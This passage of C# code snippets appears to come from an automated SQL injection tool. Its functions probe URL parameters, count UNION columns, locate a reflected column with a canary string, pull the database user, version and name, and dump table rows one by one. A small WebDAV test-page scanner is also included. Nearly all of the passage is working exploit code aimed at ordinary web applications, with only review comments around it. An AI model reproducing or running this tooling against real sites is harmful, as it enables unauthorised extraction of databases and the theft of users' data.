                        string inj   = "(select concat(" + BuildQuery(s_separateur, colonne) + ") from " + mrc[0] + "." + mrc[1] + " limit " + d + ",1)";
                        string url_f = _url_point.Replace(var_n, inj);
                        string page  = hr.get(url_f);

                        string   donnebrut    = ch.extResult(separateur, page);
                        // Empty fields are kept (StringSplitOptions.None) so values stay aligned with columns.
                        string[] resultLignes = donnebrut.Split(new string[] { s_separateur }, StringSplitOptions.None);
                        // NOTE(review): the row is added when checkAllEmpty returns true; the helper is
                        // not visible here, so confirm which sense its result has.
                        if (checkAllEmpty(resultLignes))
                        {
                            form_principale.dataGridView_dumper.Invoke((MethodInvoker)(() =>
                            {
                                form_principale.dataGridView_dumper.Rows.Add(resultLignes);
                            }));
                        }
                    }
                }
            }
        }
コード例 #21
        /// <summary>
        /// Requests <paramref name="url"/> once per parameter with an encoded test expression in
        /// place of that parameter's value and returns as soon as <c>verifPageAdvenced</c> accepts
        /// a response.
        /// </summary>
        /// <param name="url">URL to test; the part before the first '?' is used as the base.</param>
        /// <returns>
        /// <c>true</c> on the first response accepted by <c>verifPageAdvenced</c>; otherwise <c>false</c>.
        /// </returns>
        /// <remarks>
        /// The test expression is built by nesting <c>baseF</c> inside <c>baseI</c> at their
        /// <c>var_n</c> placeholders, with <c>testSTR</c> between two markers. Overwrites the
        /// <c>_param</c> field. Exceptions from the request are not caught.
        /// </remarks>
        public bool demmareAnalyseAvanced(string url)
        {
            checked
            {
                string baseUrl = url.Split('?')[0];
                HttpRequete client = new HttpRequete();
                chaine helper = new chaine();
                _param = helper.analyseParam(url);

                string testExpression = baseI.Replace(var_n, baseF.Replace(var_n, helper.getHex(separateur) + "," + helper.getHex(testSTR) + "," + helper.getHex(separateur)));

                int index = 0;
                while (index < _param.Count)
                {
                    // Leading parameters with the last value emptied, the encoded expression, then the rest.
                    string candidate = baseUrl + helper.ViderDernierParam(helper.genParamParIndex(_param, 0, index + 1)) + helper.Encode(testExpression) + helper.genParamParIndex(_param, index + 1, _param.Count);
                    string body = client.get(candidate);
                    if (verifPageAdvenced(body))
                    {
                        return true;
                    }

                    index++;
                }

                return false;
            }
        }
コード例 #22
        /// <summary>
        /// Tries each column number from 1 to <paramref name="maxColonne"/> + 1: replaces the first
        /// occurrence of that number in the query string with a marker-wrapped canary expression,
        /// requests the URL, and returns the first number whose response echoes the canary.
        /// </summary>
        /// <param name="url">URL containing a '?'; everything after the first '?' up to the next one is the query part.</param>
        /// <param name="maxColonne">Highest column number to try, minus one.</param>
        /// <returns>The matching column number, or -1 when no response contains the canary.</returns>
        /// <remarks>
        /// The canary "QUADCOREENGINE666" and the 0x217e21 marker are fixed literals, so they work as
        /// signatures for this tool in request logs (the canary is sent via <c>ch.getHex</c>,
        /// presumably hex-encoded) and in response bodies. The number is matched as plain digits
        /// anywhere in the query string, not only in a column list. Throws when <paramref name="url"/>
        /// has no '?'.
        /// </remarks>
        public int FindColonneVise(string url, int maxColonne)
        {
            HttpRequete client = new HttpRequete();
            const string canary = "QUADCOREENGINE666";
            string template = "concat(0x217e21," + var_n + ",0x217e21)";
            string basePart = url.Split('?')[0];
            string queryPart = "?" + url.Split('?')[1];

            int column = 1;
            while (column <= maxColonne + 1)
            {
                string replacement = ch.Encode(template.Replace(var_n, ch.getHex(canary)));
                Regex digits = new Regex(Regex.Escape(column.ToString()));

                // Only the first occurrence of the digits is replaced.
                string candidate = basePart + digits.Replace(queryPart, replacement, 1);
                string body = client.get(candidate);
                if (body.Contains(canary))
                {
                    return column;
                }

                column++;
            }

            return -1;
        }
コード例 #23
 /// <summary>
 /// For each parameter, requests the URL with the <paramref name="union"/> template expanded
 /// by <c>GenSynHex(i)</c> for i = 0..60 and returns the first i whose response contains
 /// <c>syntax_count</c>.
 /// </summary>
 /// <param name="param">Parsed URL parameters.</param>
 /// <param name="url_base">URL part before the query string.</param>
 /// <param name="union">Template containing the <c>var_n</c> placeholder.</param>
 /// <returns>
 /// The matching i, or 0 when nothing matched; a match at i = 0 and "no match" are
 /// indistinguishable to the caller.
 /// </returns>
 /// <remarks>
 /// Worst case this sends 61 requests per parameter, a burst that differs only in the
 /// expanded template. Exceptions from the request are not caught.
 /// </remarks>
 public int Compter(List <string> param, string url_base, string union)
 {
     checked
     {
         HttpRequete client = new HttpRequete();

         int paramIndex = 0;
         while (paramIndex < param.Count)
         {
             int count = 0;
             while (count <= 60)
             {
                 string candidate = url_base +
                                    ch.ViderDernierParam(ch.genParamParIndex(param, 0, (paramIndex + 1))) +
                                    ch.Encode(union.Replace(var_n, GenSynHex(count))) +
                                    ch.genParamParIndex(param, paramIndex + 1, param.Count);
                 string body = client.get(candidate);
                 if (body.Contains(syntax_count))
                 {
                     return count;
                 }

                 count++;
             }

             paramIndex++;
         }

         return 0;
     }
 }
コード例 #24
        /// <summary>
        /// Requests <c>http://{url}/webdav/</c> and reports whether the response contains the
        /// text "WebDAV testpage".
        /// </summary>
        /// <param name="url">Host (and optional path prefix) without scheme.</param>
        /// <returns><c>true</c> when the test-page text is present; <c>false</c> otherwise or on any exception.</returns>
        /// <remarks>
        /// The check matches a default test page left reachable under <c>/webdav/</c>; removing that
        /// page or the directory makes it report <c>false</c>. Only plain http is tried.
        /// </remarks>
        public bool WebDav_Scanner(string url)
        {
            HttpRequete client = new HttpRequete();

            try
            {
                string target = "http://" + (url + "/webdav/");
                string body = client.get(target);
                return body.Contains("WebDAV testpage");
            }
            catch (Exception)
            {
                // Every failure is reported as "not found".
                return false;
            }
        }
コード例 #25
        /// <summary>
        /// Walks the <c>_unionStyle</c> templates and the URL parameters until a response contains
        /// one of the marker strings, and returns the URL template that produced it.
        /// </summary>
        /// <param name="url">URL to analyse; the part before the first '?' becomes <c>_url_base</c>.</param>
        /// <returns>
        /// The matching URL template (before the final "[t]" substitution), or the literal string
        /// "False" when nothing matched. Callers must compare against that string, not a boolean.
        /// </returns>
        /// <remarks>
        /// Writes the fields <c>_url_originale</c>, <c>_url_base</c>, <c>_param</c>,
        /// <c>_nbr_colonne</c> and <c>_colonne_point</c>. No exception is caught here.
        /// </remarks>
        public string Analyse(string url)
        {
            // Integer arithmetic below (p + 1) runs in a checked context.
            checked
            {
                HttpRequete  hr             = new HttpRequete();
                // vrf is constructed but not used in this method.
                sqli_check   vrf            = new sqli_check();
                sqli_colonne colonne        = new sqli_colonne();
                string       url_inj_point  = string.Empty;
                string       inj_point_curr = string.Empty;
                // point_trv is never set to true here; the loop ends by return or by exhausting _unionStyle.
                bool         point_trv      = false;
                _url_originale = url;
                _url_base      = url.Split('?')[0];
                _param         = ch.analyseParam(url);

                int u = 0; // index into _unionStyle (first template is "Union Style 1")
                while (!point_trv && u < _unionStyle.Count)
                {
                    _nbr_colonne = colonne.Compter(_param, _url_base, _unionStyle[u]);
                    for (int p = 0; p < _param.Count; p++)
                    {
                        // _colonne_point is read inside the argument of the call that assigns it,
                        // so the URL passed in is built from the value left by the previous pass.
                        _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);

                        // Same URL shape again, now with the freshly assigned _colonne_point.
                        url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);

                        // Any "[t]" still present is replaced by the encoded
                        // concat(user(), version(), database()) expression.
                        inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));

                        string page = hr.get(inj_point_curr);
                        // Either marker in the response counts as a hit.
                        if (page.Contains(separateur) || page.Contains(s_separateur))
                        {
                            return(url_inj_point);
                        }
                    }
                    u++;
                }
                return("False");
            }
        }